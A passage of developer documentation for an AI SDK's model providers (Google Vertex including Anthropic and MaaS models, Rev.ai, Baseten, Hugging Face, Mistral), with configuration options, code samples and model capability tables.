- CODE_RETRIEVAL_QUERY: Optimized for retrieving code blocks based on natural language queries.
title: string

Optional. The title of the document being embedded. This helps the model produce better embeddings by providing additional context. Only valid when taskType is set to 'RETRIEVAL_DOCUMENT'.
autoTruncate: boolean

Optional. When set to true, input text will be truncated if it exceeds the maximum length. When set to false, an error is returned if the input text is too long. Defaults to true.

Model Capabilities

Model	Max Values Per Call	Parallel Calls	Multimodal
`text-embedding-005`	2048
`gemini-embedding-2-preview`	2048

Image Models

You can create Imagen models that call the Imagen on Vertex AI API using the .image() factory method. For more on image generation with the AI SDK see generateImage().

import { vertex } from '@ai-sdk/google-vertex';
import { experimental_generateImage as generateImage } from 'ai';

const { image } = await generateImage({
  model: vertex.image('imagen-4.0-generate-001'),
  prompt: 'A futuristic cityscape at sunset',
  aspectRatio: '16:9',
});

Further configuration can be done using Google Vertex provider options. You can validate the provider options using the GoogleVertexImageProviderOptions type.

import { vertex } from '@ai-sdk/google-vertex';
import { GoogleVertexImageProviderOptions } from '@ai-sdk/google-vertex';
import { experimental_generateImage as generateImage } from 'ai';

const { image } = await generateImage({
  model: vertex.image('imagen-4.0-generate-001'),
  providerOptions: {
    vertex: {
      negativePrompt: 'pixelated, blurry, low-quality',
    } satisfies GoogleVertexImageProviderOptions,
  },
  // ...
});

The following provider options are available:

negativePrompt string A description of what to discourage in the generated images.
personGeneration allow_adult | allow_all | dont_allow Whether to allow person generation. Defaults to allow_adult.
safetySetting block_low_and_above | block_medium_and_above | block_only_high | block_none Whether to block unsafe content. Defaults to block_medium_and_above.
addWatermark boolean Whether to add an invisible watermark to the generated images. Defaults to true.
storageUri string Cloud Storage URI to store the generated images.

Additional information about the images can be retrieved using Google Vertex meta data.

import { vertex } from '@ai-sdk/google-vertex';
import { GoogleVertexImageProviderOptions } from '@ai-sdk/google-vertex';
import { experimental_generateImage as generateImage } from 'ai';

const { image, providerMetadata } = await generateImage({
  model: vertex.image('imagen-4.0-generate-001'),
  prompt: 'A futuristic cityscape at sunset',
  aspectRatio: '16:9',
});

console.log(
  `Revised prompt: ${providerMetadata.vertex.images[0].revisedPrompt}`,
);

Model Capabilities

Model	Aspect Ratios
`imagen-3.0-generate-001`	1:1, 3:4, 4:3, 9:16, 16:9
`imagen-3.0-generate-002`	1:1, 3:4, 4:3, 9:16, 16:9
`imagen-3.0-fast-generate-001`	1:1, 3:4, 4:3, 9:16, 16:9
`imagen-4.0-generate-001`	1:1, 3:4, 4:3, 9:16, 16:9
`imagen-4.0-fast-generate-001`	1:1, 3:4, 4:3, 9:16, 16:9
`imagen-4.0-ultra-generate-001`	1:1, 3:4, 4:3, 9:16, 16:9

Google Vertex Anthropic Provider Usage

Provider Instance

You can import the default provider instance vertexAnthropic from @ai-sdk/google-vertex/anthropic:

import { vertexAnthropic } from '@ai-sdk/google-vertex/anthropic';

If you need a customized setup, you can import createVertexAnthropic from @ai-sdk/google-vertex/anthropic and create a provider instance with your settings:

import { createVertexAnthropic } from '@ai-sdk/google-vertex/anthropic';

const vertexAnthropic = createVertexAnthropic({
  project: 'my-project', // optional
  location: 'us-central1', // optional
});

Node.js Runtime

import { createVertexAnthropic } from '@ai-sdk/google-vertex/anthropic';

const vertexAnthropic = createVertexAnthropic({
  googleAuthOptions: {
    credentials: {
      client_email: 'my-email',
      private_key: 'my-private-key',
    },
  },
});

Optional Provider Settings

You can use the following optional settings to customize the Google Vertex Anthropic provider instance:

project string

The Google Cloud project ID that you want to use for the API calls. It uses the GOOGLE_VERTEX_PROJECT environment variable by default.
location string

The Google Cloud location that you want to use for the API calls, e.g. us-central1. It uses the GOOGLE_VERTEX_LOCATION environment variable by default.
googleAuthOptions object

Optional. The Authentication options used by the Google Auth Library. See also the GoogleAuthOptions interface.
- authClient object An AuthClient to use.
- keyFilename string Path to a .json, .pem, or .p12 key file.
- keyFile string Path to a .json, .pem, or .p12 key file.
- credentials object Object containing client_email and private_key properties, or the external account client options.
- clientOptions object Options object passed to the constructor of the client.
- scopes string | string[] Required scopes for the desired API request.
- projectId string Your project ID.
- universeDomain string The default service domain for a given Cloud universe.
headers Resolvable<Record<string, string | undefined>>

Headers to include in the requests. Can be provided in multiple formats:
- A record of header key-value pairs: Record<string, string | undefined>
- A function that returns headers: () => Record<string, string | undefined>
- An async function that returns headers: async () => Record<string, string | undefined>
- A promise that resolves to headers: Promise<Record<string, string | undefined>>
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.

Edge Runtime

For Edge runtimes, you can import the provider instance from @ai-sdk/google-vertex/anthropic/edge:

import { vertexAnthropic } from '@ai-sdk/google-vertex/anthropic/edge';

To customize the setup, use createVertexAnthropic from the same module:

import { createVertexAnthropic } from '@ai-sdk/google-vertex/anthropic/edge';

const vertexAnthropic = createVertexAnthropic({
  project: 'my-project', // optional
  location: 'us-central1', // optional
});

For Edge runtime authentication, set these environment variables from your Google Default Application Credentials JSON file:

GOOGLE_CLIENT_EMAIL
GOOGLE_PRIVATE_KEY
GOOGLE_PRIVATE_KEY_ID (optional)

Optional Provider Settings

You can use the following optional settings to customize the provider instance:

project string

The Google Cloud project ID that you want to use for the API calls. It uses the GOOGLE_VERTEX_PROJECT environment variable by default.
location string

The Google Cloud location that you want to use for the API calls, e.g. us-central1. It uses the GOOGLE_VERTEX_LOCATION environment variable by default.
googleCredentials object

Optional. The credentials used by the Edge provider for authentication. These credentials are typically set through environment variables and are derived from a service account JSON file.
- clientEmail string The client email from the service account JSON file. Defaults to the contents of the GOOGLE_CLIENT_EMAIL environment variable.
- privateKey string The private key from the service account JSON file. Defaults to the contents of the GOOGLE_PRIVATE_KEY environment variable.
- privateKeyId string The private key ID from the service account JSON file (optional). Defaults to the contents of the GOOGLE_PRIVATE_KEY_ID environment variable.
headers Resolvable<Record<string, string | undefined>>

Headers to include in the requests. Can be provided in multiple formats:
- A record of header key-value pairs: Record<string, string | undefined>
- A function that returns headers: () => Record<string, string | undefined>
- An async function that returns headers: async () => Record<string, string | undefined>
- A promise that resolves to headers: Promise<Record<string, string | undefined>>
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.

Language Models

You can create models that call the Anthropic Messages API using the provider instance. The first argument is the model id, e.g. claude-3-haiku-20240307. Some models have multi-modal capabilities.

const model = anthropic('claude-3-haiku-20240307');

You can use Anthropic language models to generate text with the generateText function:

import { vertexAnthropic } from '@ai-sdk/google-vertex/anthropic';
import { generateText } from 'ai';

const { text } = await generateText({
  model: vertexAnthropic('claude-3-haiku-20240307'),
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});

Anthropic language models can also be used in the streamText, generateObject, and streamObject functions (see AI SDK Core).

The following optional provider options are available for Anthropic models:

sendReasoning boolean

Optional. Include reasoning content in requests sent to the model. Defaults to true.

If you are experiencing issues with the model handling requests involving reasoning content, you can set this to false to omit them from the request.
thinking object

Optional. See Reasoning section for more details.
metadata object

Optional. Metadata to include with the request. See the Anthropic API documentation for details.
- userId string - An external identifier for the end-user.

Reasoning

Anthropic has reasoning support for the claude-3-7-sonnet@20250219 model.

You can enable it using the thinking provider option and specifying a thinking budget in tokens.

import { vertexAnthropic } from '@ai-sdk/google-vertex/anthropic';
import { generateText } from 'ai';

const { text, reasoningText, reasoning } = await generateText({
  model: vertexAnthropic('claude-3-7-sonnet@20250219'),
  prompt: 'How many people will live in the world in 2040?',
  providerOptions: {
    anthropic: {
      thinking: { type: 'enabled', budgetTokens: 12000 },
    },
  },
});

console.log(reasoningText); // reasoning text
console.log(reasoning); // reasoning details including redacted reasoning
console.log(text); // text response

See AI SDK UI: Chatbot for more details on how to integrate reasoning into your chatbot.

Cache Control

import { vertexAnthropic } from '@ai-sdk/google-vertex/anthropic';
import { generateText } from 'ai';

const errorMessage = '... long error message ...';

const result = await generateText({
  model: vertexAnthropic('claude-3-5-sonnet-20240620'),
  messages: [
    {
      role: 'user',
      content: [
        { type: 'text', text: 'You are a JavaScript expert.' },
        {
          type: 'text',
          text: `Error message: ${errorMessage}`,
          providerOptions: {
            anthropic: { cacheControl: { type: 'ephemeral' } },
          },
        },
        { type: 'text', text: 'Explain the error message.' },
      ],
    },
  ],
});

console.log(result.text);
console.log(result.providerMetadata?.anthropic);
// e.g. { cacheCreationInputTokens: 2118, cacheReadInputTokens: 0 }

You can also use cache control on system messages by providing multiple system messages at the head of your messages array:

const result = await generateText({
  model: vertexAnthropic('claude-3-5-sonnet-20240620'),
  messages: [
    {
      role: 'system',
      content: 'Cached system message part',
      providerOptions: {
        anthropic: { cacheControl: { type: 'ephemeral' } },
      },
    },
    {
      role: 'system',
      content: 'Uncached system message part',
    },
    {
      role: 'user',
      content: 'User prompt',
    },
  ],
});

For more on prompt caching with Anthropic, see Google Vertex AI's Claude prompt caching documentation and Anthropic's Cache Control documentation.

Computer Use

Anthropic provides three built-in tools that can be used to interact with external systems:

Bash Tool: Allows running bash commands.
Text Editor Tool: Provides functionality for viewing and editing text files.
Computer Tool: Enables control of keyboard and mouse actions on a computer.

They are available via the tools property of the provider instance.

For more background see Anthropic's Computer Use documentation.

Bash Tool

The Bash Tool allows running bash commands. Here's how to create and use it:

const bashTool = vertexAnthropic.tools.bash_20241022({
  execute: async ({ command, restart }) => {
    // Implement your bash command execution logic here
    // Return the result of the command execution
  },
});

Parameters:

command (string): The bash command to run. Required unless the tool is being restarted.
restart (boolean, optional): Specifying true will restart this tool.

Text Editor Tool

The Text Editor Tool provides functionality for viewing and editing text files:

const textEditorTool = vertexAnthropic.tools.textEditor_20241022({
  execute: async ({
    command,
    path,
    file_text,
    insert_line,
    new_str,
    old_str,
    view_range,
  }) => {
    // Implement your text editing logic here
    // Return the result of the text editing operation
  },
});

Parameters:

command ('view' | 'create' | 'str_replace' | 'insert' | 'undo_edit'): The command to run.
path (string): Absolute path to file or directory, e.g. /repo/file.py or /repo.
file_text (string, optional): Required for create command, with the content of the file to be created.
insert_line (number, optional): Required for insert command. The line number after which to insert the new string.
new_str (string, optional): New string for str_replace or insert commands.
old_str (string, optional): Required for str_replace command, containing the string to replace.
view_range (number[], optional): Optional for view command to specify line range to show.

Computer Tool

The Computer Tool enables control of keyboard and mouse actions on a computer:

const computerTool = vertexAnthropic.tools.computer_20241022({
  displayWidthPx: 1920,
  displayHeightPx: 1080,
  displayNumber: 0, // Optional, for X11 environments

  execute: async ({ action, coordinate, text }) => {
    // Implement your computer control logic here
    // Return the result of the action

    // Example code:
    switch (action) {
      case 'screenshot': {
        // multipart result:
        return {
          type: 'image',
          data: fs
            .readFileSync('./data/screenshot-editor.png')
            .toString('base64'),
        };
      }
      default: {
        console.log('Action:', action);
        console.log('Coordinate:', coordinate);
        console.log('Text:', text);
        return `executed ${action}`;
      }
    }
  },

  // map to tool result content for LLM consumption:
  toModelOutput(result) {
    return typeof result === 'string'
      ? [{ type: 'text', text: result }]
      : [{ type: 'image', data: result.data, mediaType: 'image/png' }];
  },
});

Parameters:

action ('key' | 'type' | 'mouse_move' | 'left_click' | 'left_click_drag' | 'right_click' | 'middle_click' | 'double_click' | 'screenshot' | 'cursor_position'): The action to perform.
coordinate (number[], optional): Required for mouse_move and left_click_drag actions. Specifies the (x, y) coordinates.
text (string, optional): Required for type and key actions.

These tools can be used in conjunction with the claude-3-5-sonnet-v2@20241022 model to enable more complex interactions and tasks.

Model Capabilities

The latest Anthropic model list on Vertex AI is available here. See also Anthropic Model Comparison.

Model	Image Input	Object Generation	Tool Usage	Tool Streaming	Computer Use
`claude-3-7-sonnet@20250219`
`claude-3-5-sonnet-v2@20241022`
`claude-3-5-sonnet@20240620`
`claude-3-5-haiku@20241022`
`claude-3-sonnet@20240229`
`claude-3-haiku@20240307`
`claude-3-opus@20240229`

Google Vertex MaaS Provider Usage

The Google Vertex MaaS (Model as a Service) provider offers access to partner and open models hosted on Vertex AI through an OpenAI-compatible Chat Completions API. This includes models from DeepSeek, Qwen, Meta, MiniMax, Moonshot, and OpenAI.

For more information, see the Vertex AI MaaS documentation.

Provider Instance

You can import the default provider instance vertexMaas from @ai-sdk/google-vertex/maas:

import { vertexMaas } from '@ai-sdk/google-vertex/maas';

If you need a customized setup, you can import createVertexMaas from @ai-sdk/google-vertex/maas and create a provider instance with your settings:

import { createVertexMaas } from '@ai-sdk/google-vertex/maas';

const vertexMaas = createVertexMaas({
  project: 'my-project', // optional
  location: 'us-east5', // optional, defaults to 'global'
});

Node.js Runtime

For Node.js environments, the Google Vertex MaaS provider supports all standard Google Cloud authentication options through the google-auth-library:

import { createVertexMaas } from '@ai-sdk/google-vertex/maas';

const vertexMaas = createVertexMaas({
  googleAuthOptions: {
    credentials: {
      client_email: 'my-email',
      private_key: 'my-private-key',
    },
  },
});

Optional Provider Settings

project string

The Google Cloud project ID. Defaults to the GOOGLE_VERTEX_PROJECT environment variable.
location string

The Google Cloud location, e.g. us-east5 or global. Defaults to the GOOGLE_VERTEX_LOCATION environment variable. If not set, defaults to global.
googleAuthOptions object

Optional. The Authentication options used by the Google Auth Library.
headers Resolvable<Record<string, string | undefined>>

Headers to include in requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation.

Edge Runtime

For Edge runtimes, import from @ai-sdk/google-vertex/maas/edge:

import { vertexMaas } from '@ai-sdk/google-vertex/maas/edge';

import { createVertexMaas } from '@ai-sdk/google-vertex/maas/edge';

const vertexMaas = createVertexMaas({
  project: 'my-project',
  location: 'us-east5',
});

For Edge runtime authentication, set these environment variables:

GOOGLE_CLIENT_EMAIL
GOOGLE_PRIVATE_KEY
GOOGLE_PRIVATE_KEY_ID (optional)

Language Models

You can create models using the provider instance. The first argument is the model ID:

import { vertexMaas } from '@ai-sdk/google-vertex/maas';
import { generateText } from 'ai';

const { text } = await generateText({
  model: vertexMaas('deepseek-ai/deepseek-v3.2-maas'),
  prompt: 'Invent a new holiday and describe its traditions.',
});

Streaming is also supported:

import { vertexMaas } from '@ai-sdk/google-vertex/maas';
import { streamText } from 'ai';

const result = streamText({
  model: vertexMaas('deepseek-ai/deepseek-v3.2-maas'),
  prompt: 'Invent a new holiday and describe its traditions.',
});

for await (const textPart of result.textStream) {
  process.stdout.write(textPart);
}

Available Models

The following models are available through the MaaS provider. You can also pass any valid model ID as a string.

Model ID	Provider
`deepseek-ai/deepseek-r1-0528-maas`	DeepSeek
`deepseek-ai/deepseek-v3.1-maas`	DeepSeek
`deepseek-ai/deepseek-v3.2-maas`	DeepSeek
`openai/gpt-oss-120b-maas`	OpenAI
`openai/gpt-oss-20b-maas`	OpenAI
`meta/llama-4-maverick-17b-128e-instruct-maas`	Meta
`meta/llama-4-scout-17b-16e-instruct-maas`	Meta
`minimax/minimax-m2-maas`	MiniMax
`qwen/qwen3-coder-480b-a35b-instruct-maas`	Qwen
`qwen/qwen3-next-80b-a3b-instruct-maas`	Qwen
`qwen/qwen3-next-80b-a3b-thinking-maas`	Qwen
`moonshotai/kimi-k2-thinking-maas`	Moonshot

title: Rev.ai description: Learn how to use the Rev.ai provider for the AI SDK.

Rev.ai Provider

The Rev.ai provider contains language model support for the Rev.ai transcription API.

Setup

The Rev.ai provider is available in the @ai-sdk/revai module. You can install it with

Provider Instance

You can import the default provider instance revai from @ai-sdk/revai:

import { revai } from '@ai-sdk/revai';

If you need a customized setup, you can import createRevai from @ai-sdk/revai and create a provider instance with your settings:

import { createRevai } from '@ai-sdk/revai';

const revai = createRevai({
  // custom settings, e.g.
  fetch: customFetch,
});

You can use the following optional settings to customize the Rev.ai provider instance:

apiKey string

API key that is being sent using the Authorization header. It defaults to the REVAI_API_KEY environment variable.
headers Record<string,string>

Custom headers to include in the requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.

Transcription Models

You can create models that call the Rev.ai transcription API using the .transcription() factory method.

The first argument is the model id e.g. machine.

const model = revai.transcription('machine');

import { experimental_transcribe as transcribe } from 'ai';
import { revai } from '@ai-sdk/revai';
import { readFile } from 'fs/promises';

const result = await transcribe({
  model: revai.transcription('machine'),
  audio: await readFile('audio.mp3'),
  providerOptions: { revai: { language: 'en' } },
});

The following provider options are available:

metadata string

Optional metadata that was provided during job submission.
notification_config object

Optional configuration for a callback url to invoke when processing is complete.
- url string - Callback url to invoke when processing is complete.
- auth_headers object - Optional authorization headers, if needed to invoke the callback.
  - Authorization string - Authorization header value.
delete_after_seconds integer

Amount of time after job completion when job is auto-deleted.
verbatim boolean

Configures the transcriber to transcribe every syllable, including all false starts and disfluencies.
rush boolean

[HIPAA Unsupported] Only available for human transcriber option. When set to true, your job is given higher priority.
skip_diarization boolean

Specify if speaker diarization will be skipped by the speech engine.
skip_postprocessing boolean

Only available for English and Spanish languages. User-supplied preference on whether to skip post-processing operations.
skip_punctuation boolean

Specify if "punct" type elements will be skipped by the speech engine.
remove_disfluencies boolean

When set to true, disfluencies (like 'ums' and 'uhs') will not appear in the transcript.
remove_atmospherics boolean

When set to true, atmospherics (like <laugh>, <affirmative>) will not appear in the transcript.
filter_profanity boolean

When enabled, profanities will be filtered by replacing characters with asterisks except for the first and last.
speaker_channels_count integer

Only available for English, Spanish and French languages. Specify the total number of unique speaker channels in the audio.
speakers_count integer

Only available for English, Spanish and French languages. Specify the total number of unique speakers in the audio.
diarization_type string

Specify diarization type. Possible values: "standard" (default), "premium".
custom_vocabulary_id string

Supply the id of a pre-completed custom vocabulary submitted through the Custom Vocabularies API.
custom_vocabularies Array

Specify a collection of custom vocabulary to be used for this job.
strict_custom_vocabulary boolean

If true, only exact phrases will be used as custom vocabulary.
summarization_config object

Specify summarization options.
- model string - Model type for summarization. Possible values: "standard" (default), "premium".
- type string - Summarization formatting type. Possible values: "paragraph" (default), "bullets".
- prompt string - Custom prompt for flexible summaries (mutually exclusive with type).
translation_config object

Specify translation options.
- target_languages Array - Array of target languages for translation.
- model string - Model type for translation. Possible values: "standard" (default), "premium".
language string

Language is provided as a ISO 639-1 language code. Default is "en".
forced_alignment boolean

When enabled, provides improved accuracy for per-word timestamps for a transcript. Default is false.

Currently supported languages:
- English (en, en-us, en-gb)
- French (fr)
- Italian (it)
- German (de)
- Spanish (es)
Note: This option is not available in low-cost environment.

Model Capabilities

Model	Transcription	Duration	Segments	Language
`machine`
`low_cost`
`fusion`

title: Baseten description: Learn how to use Baseten models with the AI SDK.

Baseten Provider

Baseten is an inference platform for serving frontier, enterprise-grade opensource AI models via their API.

Setup

The Baseten provider is available via the @ai-sdk/baseten module. You can install it with

Provider Instance

You can import the default provider instance baseten from @ai-sdk/baseten:

import { baseten } from '@ai-sdk/baseten';

If you need a customized setup, you can import createBaseten from @ai-sdk/baseten and create a provider instance with your settings:

import { createBaseten } from '@ai-sdk/baseten';

const baseten = createBaseten({
  apiKey: process.env.BASETEN_API_KEY ?? '',
});

You can use the following optional settings to customize the Baseten provider instance:

baseURL string

Use a different URL prefix for API calls, e.g. to use proxy servers. The default prefix is https://inference.baseten.co/v1.
apiKey string

API key that is being sent using the Authorization header. It defaults to the BASETEN_API_KEY environment variable. It is recommended you set the environment variable using export so you do not need to include the field everytime. You can grab your Baseten API Key here
modelURL string

Custom model URL for specific models (chat or embeddings). If not provided, the default Model APIs will be used.
headers Record<string,string>

Custom headers to include in the requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation.

Model APIs

You can select Baseten models using a provider instance. The first argument is the model id, e.g. 'moonshotai/Kimi-K2-Instruct-0905': The complete supported models under Model APIs can be found here.

const model = baseten('moonshotai/Kimi-K2-Instruct-0905');

Example

You can use Baseten language models to generate text with the generateText function:

import { baseten } from '@ai-sdk/baseten';
import { generateText } from 'ai';

const { text } = await generateText({
  model: baseten('moonshotai/Kimi-K2-Instruct-0905'),
  prompt: 'What is the meaning of life? Answer in one sentence.',
});

Baseten language models can also be used in the streamText function (see AI SDK Core).

Dedicated Models

Baseten supports dedicated model URLs for both chat and embedding models. You have to specify a modelURL when creating the provider:

OpenAI-Compatible Endpoints (`/sync/v1`)

For models deployed with Baseten's OpenAI-compatible endpoints:

import { createBaseten } from '@ai-sdk/baseten';

const baseten = createBaseten({
  modelURL: 'https://model-{MODEL_ID}.api.baseten.co/sync/v1',
});
// No modelId is needed because we specified modelURL
const model = baseten();
const { text } = await generateText({
  model: model,
  prompt: 'Say hello from a Baseten chat model!',
});

`/predict` Endpoints

/predict endpoints are currently NOT supported for chat models. You must use /sync/v1 endpoints for chat functionality.

Embedding Models

You can create models that call the Baseten embeddings API using the .textEmbeddingModel() factory method. The Baseten provider uses the high-performance @basetenlabs/performance-client for optimal embedding performance.

import { createBaseten } from '@ai-sdk/baseten';
import { embed, embedMany } from 'ai';

const baseten = createBaseten({
  modelURL: 'https://model-{MODEL_ID}.api.baseten.co/sync',
});

const embeddingModel = baseten.textEmbeddingModel();

// Single embedding
const { embedding } = await embed({
  model: embeddingModel,
  value: 'sunny day at the beach',
});

// Batch embeddings
const { embeddings } = await embedMany({
  model: embeddingModel,
  values: [
    'sunny day at the beach',
    'rainy afternoon in the city',
    'snowy mountain peak',
  ],
});

Endpoint Support for Embeddings

Supported:

/sync endpoints (Performance Client automatically adds /v1/embeddings)
/sync/v1 endpoints (automatically strips /v1 before passing to Performance Client)

Not Supported:

/predict endpoints (not compatible with Performance Client)

Performance Features

The embedding implementation includes:

High-performance client: Uses @basetenlabs/performance-client for optimal performance
Automatic batching: Efficiently handles multiple texts in a single request
Connection reuse: Performance Client is created once and reused for all requests
Built-in retries: Automatic retry logic for failed requests

Error Handling

The Baseten provider includes built-in error handling for common API errors:

import { baseten } from '@ai-sdk/baseten';
import { generateText } from 'ai';

try {
  const { text } = await generateText({
    model: baseten('moonshotai/Kimi-K2-Instruct-0905'),
    prompt: 'Hello, world!',
  });
} catch (error) {
  console.error('Baseten API error:', error.message);
}

Common Error Scenarios

// Embeddings require a modelURL
try {
  baseten.textEmbeddingModel();
} catch (error) {
  // Error: "No model URL provided for embeddings. Please set modelURL option for embeddings."
}

// /predict endpoints are not supported for chat models
try {
  const baseten = createBaseten({
    modelURL:
      'https://model-{MODEL_ID}.api.baseten.co/environments/production/predict',
  });
  baseten(); // This will throw an error
} catch (error) {
  // Error: "Not supported. You must use a /sync/v1 endpoint for chat models."
}

// /sync/v1 endpoints are now supported for embeddings
const baseten = createBaseten({
  modelURL:
    'https://model-{MODEL_ID}.api.baseten.co/environments/production/sync/v1',
});
const embeddingModel = baseten.textEmbeddingModel(); // This works fine!

// /predict endpoints are not supported for embeddings
try {
  const baseten = createBaseten({
    modelURL:
      'https://model-{MODEL_ID}.api.baseten.co/environments/production/predict',
  });
  baseten.textEmbeddingModel(); // This will throw an error
} catch (error) {
  // Error: "Not supported. You must use a /sync or /sync/v1 endpoint for embeddings."
}

// Image models are not supported
try {
  baseten.imageModel('test-model');
} catch (error) {
  // Error: NoSuchModelError for imageModel
}

title: Hugging Face description: Learn how to use Hugging Face Provider.

Hugging Face Provider

The Hugging Face provider offers access to thousands of language models through Hugging Face Inference Providers, including models from Meta, DeepSeek, Qwen, and more.

API keys can be obtained from Hugging Face Settings.

Setup

The Hugging Face provider is available via the @ai-sdk/huggingface module. You can install it with:

Provider Instance

You can import the default provider instance huggingface from @ai-sdk/huggingface:

import { huggingface } from '@ai-sdk/huggingface';

For custom configuration, you can import createHuggingFace and create a provider instance with your settings:

import { createHuggingFace } from '@ai-sdk/huggingface';

const huggingface = createHuggingFace({
  apiKey: process.env.HUGGINGFACE_API_KEY ?? '',
});

You can use the following optional settings to customize the Hugging Face provider instance:

baseURL string

Use a different URL prefix for API calls, e.g. to use proxy servers. The default prefix is https://router.huggingface.co/v1.
apiKey string

API key that is being sent using the Authorization header. It defaults to the HUGGINGFACE_API_KEY environment variable. You can get your API key from Hugging Face Settings.
headers Record<string,string>

Custom headers to include in the requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation.

Language Models

You can create language models using a provider instance:

import { huggingface } from '@ai-sdk/huggingface';
import { generateText } from 'ai';

const { text } = await generateText({
  model: huggingface('deepseek-ai/DeepSeek-V3-0324'),
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});

You can also use the .responses() or .languageModel() factory methods:

const model = huggingface.responses('deepseek-ai/DeepSeek-V3-0324');
// or
const model = huggingface.languageModel('moonshotai/Kimi-K2-Instruct');

Hugging Face language models can be used in the streamText function (see AI SDK Core).

You can explore the latest and trending models with their capabilities, context size, throughput and pricing on the Hugging Face Inference Models page.

Model Capabilities

Model	Image Input	Object Generation	Tool Usage	Tool Streaming
`meta-llama/Llama-3.1-8B-Instruct`
`meta-llama/Llama-3.1-70B-Instruct`
`meta-llama/Llama-3.3-70B-Instruct`
`meta-llama/Llama-4-Scout-17B-16E-Instruct`
`deepseek-ai/DeepSeek-V3-0324`
`deepseek-ai/DeepSeek-R1`
`deepseek-ai/DeepSeek-R1-Distill-Llama-70B`
`Qwen/Qwen3-235B-A22B-Instruct-2507`
`Qwen/Qwen3-Coder-480B-A35B-Instruct`
`Qwen/Qwen2.5-VL-7B-Instruct`
`google/gemma-3-27b-it`
`moonshotai/Kimi-K2-Instruct`

title: Mistral AI description: Learn how to use Mistral.

Mistral AI Provider

The Mistral AI provider contains language model support for the Mistral chat API.

Setup

The Mistral provider is available in the @ai-sdk/mistral module. You can install it with

Provider Instance

You can import the default provider instance mistral from @ai-sdk/mistral:

import { mistral } from '@ai-sdk/mistral';

If you need a customized setup, you can import createMistral from @ai-sdk/mistral and create a provider instance with your settings:

import { createMistral } from '@ai-sdk/mistral';

const mistral = createMistral({
  // custom settings
});

You can use the following optional settings to customize the Mistral provider instance:

baseURL string

Use a different URL prefix for API calls, e.g. to use proxy servers. The default prefix is https://api.mistral.ai/v1.
apiKey string

API key that is being sent using the Authorization header. It defaults to the MISTRAL_API_KEY environment variable.
headers Record<string,string>

Custom headers to include in the requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.

Language Models

You can create models that call the Mistral chat API using a provider instance. The first argument is the model id, e.g. mistral-large-latest. Some Mistral chat models support tool calls.

const model = mistral('mistral-large-latest');

Mistral chat models also support additional model settings that are not part of the standard call settings. You can pass them as an options argument and utilize MistralLanguageModelOptions for typing:

import { mistral, type MistralLanguageModelOptions } from '@ai-sdk/mistral';
const model = mistral('mistral-large-latest');

await generateText({
  model,
  providerOptions: {
    mistral: {
      safePrompt: true, // optional safety prompt injection
      parallelToolCalls: false, // disable parallel tool calls (one tool per response)
    } satisfies MistralLanguageModelOptions,
  },
});

The following optional provider options are available for Mistral models:

safePrompt boolean

Whether to inject a safety prompt before all conversations.

Defaults to false.
documentImageLimit number

Maximum number of images to process in a document.
documentPageLimit number

Maximum number of pages to process in a document.
strictJsonSchema boolean

Whether to use strict JSON schema validation for structured outputs. Only applies when a schema is provided and only sets the strict flag in addition to using Custom Structured Outputs, which is used by default if a schema is provided.

Defaults to false.
structuredOutputs boolean

Whether to use structured outputs. When enabled, tool calls and object generation will be strict and follow the provided schema.

Defaults to true.
parallelToolCalls boolean

Whether to enable parallel function calling during tool use. When set to false, the model will use at most one tool per response.

Defaults to true.

Document OCR

Mistral chat models support document OCR for PDF files. You can optionally set image and page limits using the provider options.

const result = await generateText({
  model: mistral('mistral-small-latest'),
  messages: [
    {
      role: 'user',
      content: [
        {
          type: 'text',
          text: 'What is an embedding model according to this document?',
        },
        {
          type: 'file',
          data: new URL(
            'https://github.com/vercel/ai/blob/main/examples/ai-core/data/ai.pdf?raw=true',
          ),
          mediaType: 'application/pdf',
        },
      ],
    },
  ],
  // optional settings:
  providerOptions: {
    mistral: {
      documentImageLimit: 8,
      documentPageLimit: 64,
    },
  },
});

Reasoning Models

Mistral offers reasoning models that provide step-by-step thinking capabilities:

magistral-small-2506: Smaller reasoning model for efficient step-by-step thinking
magistral-medium-2506: More powerful reasoning model balancing performance and cost

These models return content that includes <think>...</think> tags containing the reasoning process. To properly extract and separate the reasoning from the final answer, use the extract reasoning middleware:

import { mistral } from '@ai-sdk/mistral';
import {
  extractReasoningMiddleware,
  generateText,
  wrapLanguageModel,
} from 'ai';

const result = await generateText({
  model: wrapLanguageModel({
    model: mistral('magistral-small-2506'),
    middleware: extractReasoningMiddleware({
      tagName: 'think',
    }),
  }),
  prompt: 'What is 15 * 24?',
});

console.log('REASONING:', result.reasoningText);
// Output: "Let me calculate this step by step..."

console.log('ANSWER:', result.text);
// Output: "360"

The middleware automatically parses the <think> tags and provides separate reasoningText and text properties in the result.

Example

You can use Mistral language models to generate text with the generateText function:

import { mistral } from '@ai-sdk/mistral';
import { generateText } from 'ai';

const { text } = await generateText({
  model: mistral('mistral-large-latest'),
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});

Mistral language models can also be used in the streamText, generateObject, and streamObject functions (see AI SDK Core).

Structured Outputs

Mistral chat models support structured outputs using JSON Schema. You can use generateObject or streamObject with Zod, Valibot, or raw JSON Schema. The SDK sends your schema via Mistral's response_format: { type: 'json_schema' }.

import { mistral } from '@ai-sdk/mistral';
import { generateObject } from 'ai';
import { z } from 'zod';

const result = await generateObject({
  model: mistral('mistral-large-latest'),
  schema: z.object({
    recipe: z.object({
      name: z.string(),
      ingredients: z.array(z.string()),
      instructions: z.array(z.string()),
    }),
  }),
  prompt: 'Generate a simple pasta recipe.',
});

console.log(JSON.stringify(result.object, null, 2));

You can enable strict JSON Schema validation using a provider option:

